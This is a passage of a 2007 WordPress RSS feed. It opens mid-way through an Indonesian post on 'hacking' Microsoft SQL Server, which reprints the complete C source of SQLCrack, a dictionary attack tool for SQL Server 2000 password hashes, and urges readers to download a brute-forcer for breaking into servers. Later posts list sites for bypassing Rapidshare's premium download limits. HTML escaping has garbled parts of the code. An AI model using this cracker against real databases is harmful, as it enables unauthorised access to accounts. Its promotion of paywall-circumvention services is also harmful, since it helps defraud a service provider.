8D504D65                                                               &#8212;&#8211;&gt; to calls to rand()<br />
431D6F8AA7AED333590D7DB1863CBFC98186BFAE    &#8212;&#8211;&gt; case sensitif SHA HASH<br />
06EB6B327EFA5449E6F649BA954AFF4057056D9B       &#8212;&#8211;&gt; upper case SHA HASH</p>
<p>. Gunakan pemecah HASH berikut ini :</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
SQLCrackCl</p>
<p>This will perform a dictionary attack against the<br />
upper-cased hash for a password. Once this<br />
has been discovered try all case variant to work<br />
out the case sensitive password.</p>
<p>This code was written by David Litchfield to<br />
demonstrate how Microsoft SQL Server 2000<br />
passwords can be attacked. This can be<br />
optimized considerably by not using the CryptoAPI.</p>
<p>(Compile with VC++ and link with advapi32.lib<br />
Ensure the Platform SDK has been installed, too!)</p>
<p>* Script ini telah di uji oleh : lirva32<br />
dan utk aplikasi pembobolan MS. SQL Server Anda juga<br />
bisa mempergunakan aplikasi jadi : SQLBF, silahkan<br />
googling dan donload.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>#include &lt;stdio.h&gt;<br />
#include &lt;windows.h&gt;<br />
#include &lt;wincrypt.h&gt;<br />
FILE *fd=NULL;<br />
char *lerr = &#8220;\nLength Error!\n&#8221;;<br />
int wd=0;<br />
int OpenPasswordFile(char *pwdfile);<br />
int CrackPassword(char *hash);<br />
int main(int argc, char *argv[])<br />
{<br />
int err = 0;</p>
<p>if(argc !=3)<br />
{<br />
printf(&#8220;\n\n*** SQLCrack *** \n\n&#8221;);<br />
printf(&#8220;C:\\&gt;%s hash passwd-file\n\n&#8221;,argv[0]);<br />
printf(&#8220;David Litchfield (david@ngssoftware.com)\n&#8221;);<br />
printf(&#8220;24th June 2002\n&#8221;);<br />
return 0;<br />
}<br />
err = OpenPasswordFile(argv[2]);<br />
if(err !=0)<br />
{<br />
return printf(&#8220;\nThere was an error opening the password file %s\n&#8221;,argv[2]);<br />
}<br />
err = CrackPassword(argv[1]);<br />
fclose(fd);<br />
printf(&#8220;\n\n%d&#8221;,wd);<br />
return 0;<br />
}<br />
int OpenPasswordFile(char *pwdfile)<br />
{<br />
fd = fopen(pwdfile,&#8221;r&#8221;);<br />
if(fd)<br />
return 0;<br />
else<br />
return 1;<br />
}<br />
int CrackPassword(char *hash)<br />
{<br />
char phash[100]=&#8221;";<br />
char pheader[8]=&#8221;";<br />
char pkey[12]=&#8221;";<br />
char pnorm[44]=&#8221;";<br />
char pucase[44]=&#8221;";<br />
char pucfirst[8]=&#8221;";<br />
char wttf[44]=&#8221;";<br />
char uwttf[100]=&#8221;";<br />
char *wp=NULL;<br />
char *ptr=NULL;<br />
int cnt = 0;<br />
int count = 0;<br />
unsigned int key=0;<br />
unsigned int t=0;<br />
unsigned int address = 0;<br />
unsigned char cmp=0;<br />
unsigned char x=0;<br />
HCRYPTPROV hProv=0;<br />
HCRYPTHASH hHash;</p>
<p>DWORD hl=100;<br />
unsigned char szhash[100]=&#8221;";<br />
int len=0;<br />
if(strlen(hash) !=94)<br />
{<br />
return printf(&#8220;\nThe password hash is too short!\n&#8221;);<br />
}<br />
if(hash[0]==0&#215;30 &amp;&amp; (hash[1]== &#8216;x&#8217; || hash[1] == &#8216;X&#8217;))<br />
{<br />
hash = hash + 2;<br />
strncpy(pheader,hash,4);<br />
printf(&#8220;\nHeader\t\t: %s&#8221;,pheader);<br />
if(strlen(pheader)!=4)<br />
return printf(&#8220;%s&#8221;,lerr);<br />
hash = hash + 4;<br />
strncpy(pkey,hash,8 ) ;<br />
printf(&#8220;\nRand key\t: %s&#8221;,pkey);<br />
if(strlen(pkey)! = 8 )<br />
return printf(&#8220;%s&#8221;,lerr);<br />
hash = hash + 8;<br />
strncpy(pnorm,hash,40);<br />
printf(&#8220;\nNormal\t\t: %s&#8221;,pnorm);<br />
if(strlen(pnorm)!=40)<br />
return printf(&#8220;%s&#8221;,lerr);<br />
hash = hash + 40;<br />
strncpy(pucase,hash,40);<br />
printf(&#8220;\nUpper Case\t: %s&#8221;,pucase);<br />
if(strlen(pucase)!=40)<br />
return printf(&#8220;%s&#8221;,lerr);<br />
strncpy(pucfirst,pucase,2);<br />
sscanf(pucfirst,&#8221;%x&#8221;,&amp;cmp);<br />
}<br />
else<br />
{<br />
return printf(&#8220;The password hash has an invalid format!\n&#8221;);<br />
}<br />
printf(&#8220;\n\n Trying&#8230;\n&#8221;);<br />
if(!CryptAcquireContextW(&amp;hProv, NULL , NULL , PROV_RSA_FULL ,0))<br />
{<br />
if(GetLastError()==NTE_BAD_KEYSET)<br />
{<br />
// KeySet does not exist. So create a new keyset<br />
if(!CryptAcquireContext(&amp;hProv,</p>
<p>NULL,<br />
NULL,<br />
PROV_RSA_FULL,<br />
CRYPT_NEWKEYSET ))<br />
{<br />
printf(&#8220;FAILLLLLLL!!!&#8221;);<br />
return FALSE;<br />
}<br />
}<br />
}<br />
while(1)<br />
{<br />
// get a word to try from the file<br />
ZeroMemory(wttf,44);<br />
if(!fgets(wttf,40,fd))<br />
return printf(&#8220;\nEnd of password file. Didn&#8217;t find the password.\n&#8221;);<br />
wd++;<br />
len = strlen(wttf);<br />
wttf[len-1]=0&#215;00;<br />
ZeroMemory(uwttf,84);<br />
// Convert the word to UNICODE<br />
while(count &lt; len)<br />
{<br />
uwttf[cnt]=wttf[count];<br />
cnt++;<br />
uwttf[cnt]=0&#215;00;<br />
count++;<br />
cnt++;<br />
}<br />
len &#8211;;<br />
wp = &amp;uwttf;<br />
sscanf(pkey,&#8221;%x&#8221;,&amp;key);<br />
cnt = cnt &#8211; 2;<br />
// Append the random stuff to the end of<br />
// the uppercase unicode password<br />
t = key &gt;&gt; 24;<br />
x = (unsigned char) t;<br />
uwttf[cnt]=x;<br />
cnt++;<br />
t = key &lt;&lt; 8;<br />
t = t &gt;&gt; 24;</p>
<p>x = (unsigned char) t;<br />
uwttf[cnt]=x;<br />
cnt++;<br />
t = key &lt;&lt; 16;<br />
t = t &gt;&gt; 24;<br />
x = (unsigned char) t;<br />
uwttf[cnt]=x;<br />
cnt++;<br />
t = key &lt;&lt; 24;<br />
t = t &gt;&gt; 24;<br />
x = (unsigned char) t;<br />
uwttf[cnt]=x;<br />
cnt++;<br />
// Create the hash<br />
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &amp;hHash))<br />
{<br />
printf(&#8220;Error %x during CryptCreatHash!\n&#8221;, GetLastError());<br />
return 0;<br />
}<br />
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))<br />
{<br />
printf(&#8220;Error %x during CryptHashData!\n&#8221;, GetLastError());<br />
return FALSE;<br />
}<br />
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&amp;hl,0);<br />
// Test the first byte only. Much quicker.<br />
if(szhash[0] == cmp)<br />
{<br />
// If first byte matches try the rest<br />
ptr = pucase;<br />
cnt = 1;<br />
while(cnt &lt; 20)<br />
{<br />
ptr = ptr + 2;<br />
strncpy(pucfirst,ptr,2);<br />
sscanf(pucfirst,&#8221;%x&#8221;,&amp;cmp);<br />
if(szhash[cnt]==cmp)<br />
cnt ++;<br />
else<br />
{<br />
break;<br />
}<br />
}<br />
if(cnt == 20)<br />
{</p>
<p>// We&#8217;ve found the password<br />
printf(&#8220;\nA MATCH!!! Password is %s\n&#8221;,wttf);<br />
return 0;<br />
}<br />
}<br />
count = 0;<br />
cnt=0;<br />
}<br />
return 0;<br />
}</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/23/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/23/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/23/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=23&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/16/microsoft-sql-server-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Easy Download from Rapidshare</title>
		<link>http://addrsinfo.wordpress.com/2007/04/16/easy-download-from-rapidshare/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/16/easy-download-from-rapidshare/#comments</comments>
		<pubDate>Mon, 16 Apr 2007 16:29:13 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/16/easy-download-from-rapidshare/</guid>
		<description><![CDATA[Use Link Below. Easy and Fast like you download from premium .::Rapidleecher &#38; Rapidkill::. -http://worldforfree.net/rapid/index.php -http://imeltfaces.com/ownage/index.php -http://www.holul.com/sharekiller/ -http://lapa20.com/rapidleech -http://www.osrty.com/dw/ -http://vitinhclub.net/diendan/ -http://www.masteryogashram.com/sai/leela/index.php -http://www.urban-fix.com/index.php -http://www.d7mone.com/rap/index.php -http://www.nuocngakiniem.com/Rapidshare/index.php -http://www.bvtu.net/dat/ -http://semoga-awet.org/rapid -http://www.kemeh.com/c_tpls -http://www.s-60.org/guest/media -http://www.b-j.info/bak<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=22&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Use Link Below. Easy and Fast like you download from premium</p>
<p>.::Rapidleecher &amp; Rapidkill::.</p>
<p>-http://worldforfree.net/rapid/index.php</p>
<p>-http://imeltfaces.com/ownage/index.php</p>
<p>-http://www.holul.com/sharekiller/</p>
<p>-http://lapa20.com/rapidleech</p>
<p>-http://www.osrty.com/dw/</p>
<p>-http://vitinhclub.net/diendan/</p>
<p>-http://www.masteryogashram.com/sai/leela/index.php</p>
<p>-http://www.urban-fix.com/index.php</p>
<p>-http://www.d7mone.com/rap/index.php</p>
<p>-http://www.nuocngakiniem.com/Rapidshare/index.php</p>
<p>-http://www.bvtu.net/dat/</p>
<p>-http://semoga-awet.org/rapid</p>
<p>-http://www.kemeh.com/c_tpls</p>
<p>-http://www.s-60.org/guest/media</p>
<p>-http://www.b-j.info/bak</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/22/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/22/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/22/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=22&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/16/easy-download-from-rapidshare/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Rapidshare Premium Link Generator</title>
		<link>http://addrsinfo.wordpress.com/2007/04/16/rapidshare-premium-link-generator/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/16/rapidshare-premium-link-generator/#comments</comments>
		<pubDate>Mon, 16 Apr 2007 16:28:31 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/16/rapidshare-premium-link-generator/</guid>
		<description><![CDATA[Rapidshare Premium Link Generator -http://www.rapidcat.us/ Have enjoy this site -http://kosong.biz/rapid/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=21&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Rapidshare Premium Link Generator</p>
<p>-http://www.rapidcat.us/</p>
<p>Have enjoy this site</p>
<p>-http://kosong.biz/rapid/</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/21/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/21/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/21/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=21&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/16/rapidshare-premium-link-generator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
	</channel>
</rss>
